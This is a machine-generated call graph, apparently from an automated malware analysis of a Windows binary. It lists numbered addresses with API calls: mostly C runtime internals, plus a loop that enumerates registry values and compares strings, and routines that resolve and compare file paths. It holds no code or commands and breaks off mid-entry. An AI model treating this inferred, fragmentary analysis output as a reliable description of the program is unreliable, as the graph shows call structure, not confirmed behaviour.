1fd186dae93 RaiseException 8862 1fd186daeba 8860->8862 8861->8860 8863 1fd186d9978 __CxxCallCatchBlock 9 API calls 8862->8863 8868 1fd186daec2 8863->8868 8864 1fd186daeeb __CxxCallCatchBlock 8865 1fd186d9324 _CreateFrameInfo 9 API calls 8864->8865 8866 1fd186daefe 8865->8866 8867 1fd186d9324 _CreateFrameInfo 9 API calls 8866->8867 8869 1fd186daf07 8867->8869 8868->8864 8870 1fd186d8ff8 __CxxCallCatchBlock 9 API calls 8868->8870 8870->8864 7457 1fd186d1bc4 7464 1fd186d1724 GetProcessHeap HeapAlloc 7457->7464 7459 1fd186d1bda SleepEx 7460 1fd186d1724 50 API calls 7459->7460 7462 1fd186d1bd3 7460->7462 7462->7459 7463 1fd186d159c StrCmpIW StrCmpW 7462->7463 7515 1fd186d19b0 7462->7515 7463->7462 7532 1fd186d1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7464->7532 7466 1fd186d174c 7533 1fd186d1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7466->7533 7468 1fd186d1754 7534 1fd186d1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7468->7534 7470 1fd186d175d 7535 1fd186d1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7470->7535 7472 1fd186d1766 7536 1fd186d1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7472->7536 7474 1fd186d176f 7537 1fd186d1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7474->7537 7476 1fd186d1778 7538 1fd186d1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7476->7538 7478 1fd186d1781 7539 1fd186d1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7478->7539 7480 1fd186d178a RegOpenKeyExW 7481 1fd186d17bc RegOpenKeyExW 7480->7481 7482 1fd186d19a2 7480->7482 7483 1fd186d17fb RegOpenKeyExW 7481->7483 7484 1fd186d17e5 7481->7484 7482->7462 7486 1fd186d1836 RegOpenKeyExW 7483->7486 7487 1fd186d181f 7483->7487 7540 1fd186d12b8 RegQueryInfoKeyW 7484->7540 7488 1fd186d185a 7486->7488 7489 1fd186d1871 RegOpenKeyExW 7486->7489 7549 1fd186d104c RegQueryInfoKeyW 7487->7549 7492 1fd186d12b8 16 API calls 7488->7492 7493 1fd186d18ac RegOpenKeyExW 7489->7493 7494 1fd186d1895 7489->7494 7496 1fd186d1867 RegCloseKey 7492->7496 7498 1fd186d18e7 RegOpenKeyExW 7493->7498 7499 1fd186d18d0 7493->7499 7497 1fd186d12b8 16 API calls 7494->7497 7496->7489 7500 1fd186d18a2 RegCloseKey 7497->7500 7502 1fd186d190b 7498->7502 7503 1fd186d1922 RegOpenKeyExW 7498->7503 7501 1fd186d12b8 16 API calls 7499->7501 7500->7493 7506 1fd186d18dd RegCloseKey 7501->7506 7507 1fd186d104c 6 API calls 7502->7507 7504 1fd186d1946 7503->7504 7505 1fd186d195d RegOpenKeyExW 7503->7505 7508 1fd186d104c 6 API calls 7504->7508 7509 1fd186d1998 RegCloseKey 7505->7509 7510 1fd186d1981 7505->7510 7506->7498 7511 1fd186d1918 RegCloseKey 7507->7511 7512 1fd186d1953 RegCloseKey 7508->7512 7509->7482 7513 1fd186d104c 6 API calls 7510->7513 7511->7503 7512->7505 7514 1fd186d198e RegCloseKey 7513->7514 7514->7509 7559 1fd186d14a0 7515->7559 7532->7466 7533->7468 7534->7470 7535->7472 7536->7474 7537->7476 7538->7478 7539->7480 7541 1fd186d1486 RegCloseKey 7540->7541 7542 1fd186d1323 GetProcessHeap HeapAlloc 7540->7542 7541->7483 7543 1fd186d1472 GetProcessHeap HeapFree 7542->7543 7544 1fd186d134e RegEnumValueW 7542->7544 7543->7541 7546 1fd186d13a1 7544->7546 7546->7543 7546->7544 7547 1fd186d141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 7546->7547 7548 1fd186d13cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7546->7548 7554 1fd186d1530 7546->7554 7547->7546 7548->7547 7550 1fd186d11b5 RegCloseKey 7549->7550 7552 1fd186d10bf 7549->7552 7550->7486 7551 1fd186d10cf RegEnumValueW 7551->7552 7552->7550 7552->7551 7553 1fd186d114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7552->7553 7553->7552 7555 1fd186d154a 7554->7555 7558 1fd186d1580 7554->7558 7556 1fd186d1569 StrCmpW 7555->7556 7557 1fd186d1561 StrCmpIW 7555->7557 7555->7558 7556->7555 7557->7555 7558->7546 7560 1fd186d14e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 7559->7560 7561 1fd186d14c2 GetProcessHeap HeapFree 7559->7561 7561->7560 7561->7561 8566 1fd186e47c2 8567 1fd186d9978 __CxxCallCatchBlock 9 API calls 8566->8567 8571 1fd186e47d5 8567->8571 8568 1fd186e4814 __CxxCallCatchBlock 8569 1fd186d9324 _CreateFrameInfo 9 API calls 8568->8569 8570 1fd186e4828 8569->8570 8572 1fd186d9324 _CreateFrameInfo 9 API calls 8570->8572 8571->8568 8574 1fd186d8ff8 __CxxCallCatchBlock 9 API calls 8571->8574 8573 1fd186e4838 8572->8573 8574->8568 8171 1fd186dff40 8172 1fd186dff4b 8171->8172 8180 1fd186e2c24 8172->8180 8193 1fd186dc558 EnterCriticalSection 8180->8193 8871 1fd186df440 GetProcessHeap 8575 1fd186d81c0 8576 1fd186d81c9 __scrt_release_startup_lock 8575->8576 8578 1fd186d81cd 8576->8578 8579 1fd186dbbb4 8576->8579 8580 1fd186dbbd4 8579->8580 8581 1fd186dbbed 8579->8581 8582 1fd186dbbdc 8580->8582 8583 1fd186dbbf2 8580->8583 8581->8578 8584 1fd186dd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8582->8584 8585 1fd186de864 56 API calls 8583->8585 8586 1fd186dbbe1 8584->8586 8587 1fd186dbbf7 8585->8587 8588 1fd186dd04c _invalid_parameter_noinfo 38 API calls 8586->8588 8608 1fd186ddf38 GetModuleFileNameW 8587->8608 8588->8581 8595 1fd186dbc7a 8598 1fd186db994 14 API calls 8595->8598 8596 1fd186dbc69 8597 1fd186dd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8596->8597 8607 1fd186dbc6e 8597->8607 8599 1fd186dbc96 8598->8599 8601 1fd186dbcc6 8599->8601 8602 1fd186dbcdf 8599->8602 8599->8607 8600 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8600->8581 8603 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8601->8603 8605 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8602->8605 8604 1fd186dbccf 8603->8604 8606 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8604->8606 8605->8607 8606->8581 8607->8600 8609 1fd186ddf91 8608->8609 8610 1fd186ddf7d GetLastError 8608->8610 8612 1fd186ddd78 14 API calls 8609->8612 8632 1fd186dd184 8610->8632 8614 1fd186ddfbf 8612->8614 8613 1fd186ddf8a 8615 1fd186d8070 _invalid_parameter_noinfo 8 API calls 8613->8615 8619 1fd186ddfd0 8614->8619 8637 1fd186df198 8614->8637 8618 1fd186dbc0e 8615->8618 8620 1fd186db994 8618->8620 8641 1fd186dde1c 8619->8641 8621 1fd186db9d2 8620->8621 8624 1fd186dba38 8621->8624 8658 1fd186dec1c 8621->8658 8623 1fd186dbb25 8626 1fd186dbb54 8623->8626 8624->8623 8625 1fd186dec1c 14 API calls 8624->8625 8625->8624 8627 1fd186dbb6c 8626->8627 8631 1fd186dbba4 8626->8631 8628 1fd186dd220 _invalid_parameter_noinfo 13 API calls 8627->8628 8627->8631 8629 1fd186dbb9a 8628->8629 8630 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8629->8630 8630->8631 8631->8595 8631->8596 8655 1fd186dd1d0 8632->8655 8634 1fd186dd191 Concurrency::details::SchedulerProxy::DeleteThis 8635 1fd186dd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8634->8635 8636 1fd186dd1a1 8635->8636 8636->8613 8638 1fd186df1ca 8637->8638 8639 1fd186df1a9 8637->8639 8638->8619 8639->8638 8640 1fd186def88 9 API calls 8639->8640 8640->8638 8642 1fd186dde5b 8641->8642 8646 1fd186dde40 8641->8646 8643 1fd186dece8 WideCharToMultiByte 8642->8643 8649 1fd186dde60 8642->8649 8644 1fd186ddeb7 8643->8644 8647 1fd186ddebe GetLastError 8644->8647 8648 1fd186ddee9 8644->8648 8644->8649 8645 1fd186dd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8645->8646 8646->8613 8650 1fd186dd184 13 API calls 8647->8650 8652 1fd186dece8 WideCharToMultiByte 8648->8652 8649->8645 8649->8646 8651 1fd186ddecb 8650->8651 8653 1fd186dd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8651->8653 8654 1fd186ddf10 8652->8654 8653->8646 8654->8646 8654->8647 8656 1fd186dcb10 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8655->8656 8657 1fd186dd1d9 8656->8657 8657->8634 8659 1fd186deba8 8658->8659 8660 1fd186ddd78 14 API calls 8659->8660 8661 1fd186debcc 8660->8661 8661->8621 7562 1fd186df6dc 7563 1fd186df6e8 7562->7563 7565 1fd186df70f 7563->7565 7566 1fd186e1c0c 7563->7566 7567 1fd186e1c4c 7566->7567 7568 1fd186e1c11 7566->7568 7567->7563 7569 1fd186e1c44 7568->7569 7570 1fd186e1c32 DeleteCriticalSection 7568->7570 7572 1fd186dd2a0 7569->7572 7570->7569 7570->7570 7573 1fd186dd2d6 7572->7573 7574 1fd186dd2a5 HeapFree 7572->7574 7573->7567 7574->7573 7575 1fd186dd2c0 GetLastError 7574->7575 7576 1fd186dd2cd Concurrency::details::SchedulerProxy::DeleteThis 7575->7576 7578 1fd186dd1f4 7576->7578 7581 1fd186dcb10 7578->7581 7582 1fd186dcb59 GetLastError 7581->7582 7585 1fd186dcb2f Concurrency::details::SchedulerProxy::DeleteThis 7581->7585 7583 1fd186dcb6c 7582->7583 7584 1fd186dcb8a SetLastError 7583->7584 7586 1fd186dcb87 7583->7586 7588 1fd186dc940 _invalid_parameter_noinfo 11 API calls 7583->7588 7587 1fd186dcb54 7584->7587 7585->7587 7590 1fd186dc940 GetLastError 7585->7590 7586->7584 7587->7573 7588->7586 7592 1fd186dc966 7590->7592 7591 1fd186dc96c SetLastError 7593 1fd186dc9e5 7591->7593 7592->7591 7608 1fd186dd220 7592->7608 7593->7587 7596 1fd186dc9a5 FlsSetValue 7599 1fd186dc9c8 7596->7599 7600 1fd186dc9b1 FlsSetValue 7596->7600 7597 1fd186dc995 FlsSetValue 7598 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7597->7598 7603 1fd186dc9a3 7598->7603 7615 1fd186dc758 7599->7615 7601 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7600->7601 7607 1fd186dc9c6 SetLastError 7601->7607 7603->7591 7607->7593 7614 1fd186dd231 _invalid_parameter_noinfo 7608->7614 7609 1fd186dd282 7611 1fd186dd1f4 Concurrency::details::SchedulerProxy::DeleteThis 12 API calls 7609->7611 7610 1fd186dd266 HeapAlloc 7612 1fd186dc987 7610->7612 7610->7614 7611->7612 7612->7596 7612->7597 7614->7609 7614->7610 7620 1fd186db470 7614->7620 7629 1fd186dc630 7615->7629 7623 1fd186db4c0 7620->7623 7628 1fd186dc558 EnterCriticalSection 7623->7628 7641 1fd186dc558 EnterCriticalSection 7629->7641 8662 1fd186d25dc 8663 1fd186d265a 8662->8663 8664 1fd186d26bf GetFileType 8663->8664 8671 1fd186d2777 8663->8671 8665 1fd186d26e1 8664->8665 8666 1fd186d26cd StrCpyW 8664->8666 8673 1fd186d1ad4 GetFinalPathNameByHandleW 8665->8673 8669 1fd186d26ee 8666->8669 8668 1fd186d3f88 StrCmpNIW 8668->8669 8669->8668 8669->8671 8678 1fd186d3708 StrCmpIW 8669->8678 8682 1fd186d1dd4 8669->8682 8674 1fd186d1afe StrCmpNIW 8673->8674 8675 1fd186d1b3d 8673->8675 8674->8675 8676 1fd186d1b18 lstrlenW 8674->8676 8675->8669 8676->8675 8677 1fd186d1b2a StrCpyW 8676->8677 8677->8675 8679 1fd186d373a StrCpyW StrCatW 8678->8679 8680 1fd186d3751 PathCombineW 8678->8680 8681 1fd186d375a 8679->8681 8680->8681 8681->8669 8683 1fd186d1deb 8682->8683 8685 1fd186d1df4 8682->8685 8684 1fd186d1530 2 API calls 8683->8684 8684->8685 8685->8669 8872 1fd186dd658 8873 1fd186dd67d 8872->8873 8878 1fd186dd694 8872->8878 8874 1fd186dd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8873->8874 8875 1fd186dd682 8874->8875 8877 1fd186dd04c _invalid_parameter_noinfo 38 API calls 8875->8877 8876 1fd186dd724 8879 1fd186dbb54 13 API calls 8876->8879 8880 1fd186dd68d 8877->8880 8878->8876 8887 1fd186dd6da 8878->8887 8889 1fd186dd7b6 8878->8889 8905 1fd186dd894 8878->8905 8967 1fd186dda18 8878->8967 8881 1fd186dd77c 8879->8881 8882 1fd186dd784 8881->8882 8892 1fd186dd7d7 8881->8892 8886 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8882->8886 8885 1fd186dd836 8890 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8885->8890 8888 1fd186dd78b 8886->8888 8891 1fd186dd6fd 8887->8891 8894 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8887->8894 8888->8891 8895 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8888->8895 8889->8891 8898 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8889->8898 8893 1fd186dd841 8890->8893 8896 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8891->8896 8892->8885 8892->8892 8902 1fd186dd87c 8892->8902 9004 1fd186e0eb8 8892->9004 8897 1fd186dd85a 8893->8897 8901 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8893->8901 8894->8887 8895->8888 8896->8880 8899 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8897->8899 8898->8889 8899->8880 8901->8893 8903 1fd186dd06c _invalid_parameter_noinfo 17 API calls 8902->8903 8904 1fd186dd891 8903->8904 8906 1fd186dd8c2 8905->8906 8906->8906 8907 1fd186dd8de 8906->8907 8908 1fd186dd220 _invalid_parameter_noinfo 13 API calls 8906->8908 8907->8878 8909 1fd186dd90d 8908->8909 8910 1fd186dd926 8909->8910 8912 1fd186e0eb8 38 API calls 8909->8912 8911 1fd186e0eb8 38 API calls 8910->8911 8914 1fd186dd9fc 8910->8914 8913 1fd186dd943 8911->8913 8912->8910 8913->8914 8916 1fd186dd962 8913->8916 8917 1fd186dd98d 8913->8917 8925 1fd186dd97f 8913->8925 8915 1fd186dd06c _invalid_parameter_noinfo 17 API calls 8914->8915 8918 1fd186dda17 8915->8918 8919 1fd186dd220 _invalid_parameter_noinfo 13 API calls 8916->8919 8930 1fd186dd977 8917->8930 9013 1fd186deee0 8917->9013 8924 1fd186dda7a 8918->8924 9022 1fd186e13d8 8918->9022 8922 1fd186dd96d 8919->8922 8920 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8920->8914 8921 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8921->8925 8926 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8922->8926 8929 1fd186dda8c 8924->8929 8937 1fd186ddaa1 8924->8937 8925->8920 8926->8930 8927 1fd186dd9b5 8931 1fd186dd9ba 8927->8931 8932 1fd186dd9d0 8927->8932 8934 1fd186dd894 52 API calls 8929->8934 8930->8921 8930->8925 8935 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8931->8935 8933 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8932->8933 8933->8925 8936 1fd186dda9c 8934->8936 8935->8930 8938 1fd186d8070 _invalid_parameter_noinfo 8 API calls 8936->8938 8939 1fd186ddd78 14 API calls 8937->8939 8940 1fd186ddd64 8938->8940 8941 1fd186ddb0b 8939->8941 8940->8878 8942 1fd186ddb1a 8941->8942 8943 1fd186df198 9 API calls 8941->8943 9031 1fd186dd30c 8942->9031 8943->8942 8946 1fd186ddba8 8947 1fd186dd894 52 API calls 8946->8947 8949 1fd186ddbb8 8947->8949 8948 1fd186ddd78 14 API calls 8955 1fd186ddbd2 8948->8955 8949->8936 8950 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8949->8950 8950->8936 8951 1fd186df198 9 API calls 8951->8955 8953 1fd186dd894 52 API calls 8953->8955 8954 1fd186ddcc8 FindNextFileW 8954->8955 8956 1fd186ddce0 8954->8956 8955->8948 8955->8951 8955->8953 8955->8954 8957 1fd186dd2a0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 8955->8957 8958 1fd186ddd2a 8955->8958 9053 1fd186dd4ac 8955->9053 8959 1fd186ddd0c FindClose 8956->8959 9075 1fd186e0b20 8956->9075 8957->8955 8960 1fd186ddd38 FindClose 8958->8960 8963 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8958->8963 8959->8936 8962 1fd186ddd1c 8959->8962 8960->8936 8964 1fd186ddd48 8960->8964 8966 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8962->8966 8963->8960 8965 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8964->8965 8965->8936 8966->8936 8968 1fd186dda7a 8967->8968 8969 1fd186dda58 8967->8969 8971 1fd186dda8c 8968->8971 8974 1fd186ddaa1 8968->8974 8969->8968 8970 1fd186e13d8 38 API calls 8969->8970 8970->8969 8972 1fd186dd894 56 API calls 8971->8972 8973 1fd186dda9c 8972->8973 8975 1fd186d8070 _invalid_parameter_noinfo 8 API calls 8973->8975 8976 1fd186ddd78 14 API calls 8974->8976 8977 1fd186ddd64 8975->8977 8978 1fd186ddb0b 8976->8978 8977->8878 8979 1fd186ddb1a 8978->8979 8980 1fd186df198 9 API calls 8978->8980 8981 1fd186dd30c 16 API calls 8979->8981 8980->8979 8982 1fd186ddb7b FindFirstFileExW 8981->8982 8983 1fd186ddba8 8982->8983 8992 1fd186ddbd2 8982->8992 8984 1fd186dd894 56 API calls 8983->8984 8986 1fd186ddbb8 8984->8986 8985 1fd186ddd78 14 API calls 8985->8992 8986->8973 8987 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8986->8987 8987->8973 8988 1fd186df198 9 API calls 8988->8992 8989 1fd186dd4ac 16 API calls 8989->8992 8990 1fd186dd894 56 API calls 8990->8992 8991 1fd186ddcc8 FindNextFileW 8991->8992 8993 1fd186ddce0 8991->8993 8992->8985 8992->8988 8992->8989 8992->8990 8992->8991 8994 1fd186ddd2a 8992->8994 8997 1fd186dd2a0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 8992->8997 8995 1fd186ddd0c FindClose 8993->8995 8998 1fd186e0b20 38 API calls 8993->8998 8996 1fd186ddd38 FindClose 8994->8996 9000 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8994->9000 8995->8973 8999 1fd186ddd1c 8995->8999 8996->8973 9001 1fd186ddd48 8996->9001 8997->8992 8998->8995 9003 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8999->9003 9000->8996 9002 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9001->9002 9002->8973 9003->8973 9007 1fd186e0ed5 9004->9007 9005 1fd186e0eda 9006 1fd186dd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9005->9006 9010 1fd186e0ef0 9005->9010 9012 1fd186e0ee4 9006->9012 9007->9005 9009 1fd186e0f24 9007->9009 9007->9010 9008 1fd186dd04c _invalid_parameter_noinfo 38 API calls 9008->9010 9009->9010 9011 1fd186dd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9009->9011 9010->8892 9011->9012 9012->9008 9014 1fd186def02 9013->9014 9015 1fd186def1f 9013->9015 9014->9015 9016 1fd186def10 9014->9016 9017 1fd186def29 9015->9017 9083 1fd186e19f0 9015->9083 9018 1fd186dd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9016->9018 9090 1fd186e1a40 9017->9090 9021 1fd186def15 9018->9021 9021->8927 9023 1fd186e13e0 9022->9023 9024 1fd186e13f5 9023->9024 9026 1fd186e140e 9023->9026 9025 1fd186dd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9024->9025 9027 1fd186e13fa 9025->9027 9028 1fd186ddd78 14 API calls 9026->9028 9030 1fd186e1405 9026->9030 9029 1fd186dd04c _invalid_parameter_noinfo 38 API calls 9027->9029 9028->9030 9029->9030 9030->8918 9032 1fd186dd35a 9031->9032 9033 1fd186dd336 9031->9033 9035 1fd186dd3bf 9032->9035 9038 1fd186dd35f 9032->9038 9034 1fd186dd345 FindFirstFileExW 9033->9034 9036 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9033->9036 9034->8946 9034->8955 9037 1fd186dec58 MultiByteToWideChar 9035->9037 9036->9034 9041 1fd186dd3db 9037->9041 9038->9034 9039 1fd186dd374 9038->9039 9043 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9038->9043 9040 1fd186dc5d0 14 API calls 9039->9040 9040->9034 9042 1fd186dd3e2 GetLastError 9041->9042 9045 1fd186dd420 9041->9045 9048 1fd186dd413 9041->9048 9049 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9041->9049 9044 1fd186dd184 13 API calls 9042->9044 9043->9039 9047 1fd186dd3ef 9044->9047 9045->9034 9046 1fd186dec58 MultiByteToWideChar 9045->9046 9051 1fd186dd47a 9046->9051 9052 1fd186dd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9047->9052 9050 1fd186dc5d0 14 API calls 9048->9050 9049->9048 9050->9045 9051->9034 9051->9042 9052->9034 9054 1fd186dd4fa 9053->9054 9055 1fd186dd4d6 9053->9055 9057 1fd186dd55f 9054->9057 9058 1fd186dd500 9054->9058 9056 1fd186dd4e5 9055->9056 9059 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9055->9059 9056->8955 9060 1fd186dece8 WideCharToMultiByte 9057->9060 9058->9056 9061 1fd186dd515 9058->9061 9062 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9058->9062 9059->9056 9066 1fd186dd583 9060->9066 9063 1fd186dc5d0 14 API calls 9061->9063 9062->9061 9063->9056 9064 1fd186dd58a GetLastError 9065 1fd186dd184 13 API calls 9064->9065 9068 1fd186dd597 9065->9068 9066->9064 9069 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9066->9069 9073 1fd186dd5bb 9066->9073 9074 1fd186dd5c7 9066->9074 9067 1fd186dece8 WideCharToMultiByte 9071 1fd186dd629 9067->9071 9072 1fd186dd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9068->9072 9069->9073 9070 1fd186dc5d0 14 API calls 9070->9074 9071->9056 9071->9064 9072->9056 9073->9070 9074->9056 9074->9067 9076 1fd186e0b52 9075->9076 9077 1fd186dd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9076->9077 9082 1fd186e0b67 9076->9082 9078 1fd186e0b5c 9077->9078 9079 1fd186dd04c _invalid_parameter_noinfo 38 API calls 9078->9079 9079->9082 9080 1fd186d8070 _invalid_parameter_noinfo 8 API calls 9081 1fd186e0ea8 9080->9081 9081->8959 9082->9080 9084 1fd186e19f9 9083->9084 9085 1fd186e1a12 HeapSize 9083->9085 9086 1fd186dd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9084->9086 9087 1fd186e19fe 9086->9087 9088 1fd186dd04c _invalid_parameter_noinfo 38 API calls 9087->9088 9089 1fd186e1a09 9088->9089 9089->9017 9091 1fd186e1a55 9090->9091 9092 1fd186e1a5f 9090->9092 9094 1fd186dc5d0 14 API calls 9091->9094 9093 1fd186e1a64 9092->9093 9101 1fd186e1a6b _invalid_parameter_noinfo 9092->9101 9095 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9093->9095 9098 1fd186e1a5d 9094->9098 9095->9098 9096 1fd186e1a71 9099 1fd186dd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9096->9099 9097 1fd186e1a9e HeapReAlloc 9097->9098 9097->9101 9098->9021 9099->9098 9100 1fd186db470 _invalid_parameter_noinfo 2 API calls 9100->9101 9101->9096 9101->9097 9101->9100 8686 1fd186dc1d8 8687 1fd186dc1f1 8686->8687 8688 1fd186dc209 8686->8688 8687->8688 8689 1fd186dd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8687->8689 8689->8688 7652 1fd186db0d4 7658 1fd186db007 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 7652->7658 7653 1fd186db0fb 7664 1fd186d9324 7653->7664 7655 1fd186db100 7656 1fd186d9324 _CreateFrameInfo 9 API calls 7655->7656 7657 1fd186db10b __FrameHandler3::GetHandlerSearchState 7655->7657 7656->7657 7658->7653 7658->7657 7659 1fd186d99cc 9 API calls Is_bad_exception_allowed 7658->7659 7661 1fd186d99f4 7658->7661 7659->7658 7662 1fd186d9324 _CreateFrameInfo 9 API calls 7661->7662 7663 1fd186d9a02 7662->7663 7663->7658 7667 1fd186d9340 7664->7667 7666 1fd186d932d 7666->7655 7668 1fd186d9358 7667->7668 7669 1fd186d935f GetLastError 7667->7669 7668->7666 7679 1fd186d9c8c 7669->7679 7683 1fd186d9aac 7679->7683 7684 1fd186d9af0 __vcrt_FlsAlloc 7683->7684 7690 1fd186d9b96 TlsGetValue 7683->7690 7685 1fd186d9b1e LoadLibraryExW 7684->7685 7686 1fd186d9bdd GetProcAddress 7684->7686 7684->7690 7691 1fd186d9b61 LoadLibraryExW 7684->7691 7687 1fd186d9bbd 7685->7687 7688 1fd186d9b3f GetLastError 7685->7688 7686->7690 7687->7686 7689 1fd186d9bd4 FreeLibrary 7687->7689 7688->7684 7689->7686 7691->7684 7691->7687 9102 1fd186d2e54 9104 1fd186d2ea8 9102->9104 9103 1fd186d2ec3 9104->9103 9106 1fd186d37f4 9104->9106 9107 1fd186d388a 9106->9107 9109 1fd186d3819 9106->9109 9107->9103 9108 1fd186d3f88 StrCmpNIW 9108->9109 9109->9107 9109->9108 9110 1fd186d1e08 StrCmpIW StrCmpW 9109->9110 9110->9109 8194 1fd186e494f 8195 1fd186e4968 8194->8195 8196 1fd186e495e 8194->8196 8198 1fd186dc5ac LeaveCriticalSection 8196->8198 8690 1fd186e19d0 8691 1fd186de864 56 API calls 8690->8691 8692 1fd186e19d9 8691->8692 7692 1fd186d86d0 7695 1fd186d90c0 7692->7695 7694 1fd186d86f9 7696 1fd186d9116 7695->7696 7697 1fd186d90e1 7695->7697 7696->7694 7697->7696 7699 1fd186dc328 7697->7699 7700 1fd186dc335 7699->7700 7701 1fd186dc33f 7699->7701 7700->7701 7706 1fd186dc35a 7700->7706 7702 1fd186dd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7701->7702 7703 1fd186dc346 7702->7703 7708 1fd186dd04c 7703->7708 7704 1fd186dc352 7704->7696 7706->7704 7707 1fd186dd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7706->7707 7707->7703 7711 1fd186dcef8 7708->7711 7712 1fd186dcf23 7711->7712 7719 1fd186dcf94 7712->7719 7714 1fd186dcf4a 7715 1fd186dcf6d 7714->7715 7729 1fd186dc3e0 7714->7729 7717 1fd186dcf82 7715->7717 7718 1fd186dc3e0 _invalid_parameter_noinfo 17 API calls 7715->7718 7717->7704 7718->7717 7742 1fd186dccc8 7719->7742 7725 1fd186dcfcf 7725->7714 7730 1fd186dc438 7729->7730 7731 1fd186dc3ef GetLastError 7729->7731 7730->7715 7732 1fd186dc404 7731->7732 7733 1fd186dcba0 _invalid_parameter_noinfo 14 API calls 7732->7733 7734 1fd186dc41e SetLastError 7733->7734 7734->7730 7735 1fd186dc441 7734->7735 7736 1fd186dc3e0 _invalid_parameter_noinfo 15 API calls 7735->7736 7737 1fd186dc467 7736->7737 7782 1fd186dffe8 7737->7782 7743 1fd186dcce4 GetLastError 7742->7743 7744 1fd186dcd1f 7742->7744 7745 1fd186dccf4 7743->7745 7744->7725 7748 1fd186dcd34 7744->7748 7755 1fd186dcba0 7745->7755 7749 1fd186dcd68 7748->7749 7750 1fd186dcd50 GetLastError SetLastError 7748->7750 7749->7725 7751 1fd186dd06c IsProcessorFeaturePresent 7749->7751 7750->7749 7752 1fd186dd07f 7751->7752 7760 1fd186dcd80 7752->7760 7756 1fd186dcbc8 FlsGetValue 7755->7756 7758 1fd186dcbc4 7755->7758 7756->7758 7757 1fd186dcbde SetLastError 7757->7744 7758->7757 7759 1fd186dc940 _invalid_parameter_noinfo 13 API calls 7758->7759 7759->7757 7761 1fd186dcdba _invalid_parameter_noinfo 7760->7761 7762 1fd186dcde2 RtlCaptureContext RtlLookupFunctionEntry 7761->7762 7763 1fd186dce64 IsDebuggerPresent SetUnhandledExceptionFilter 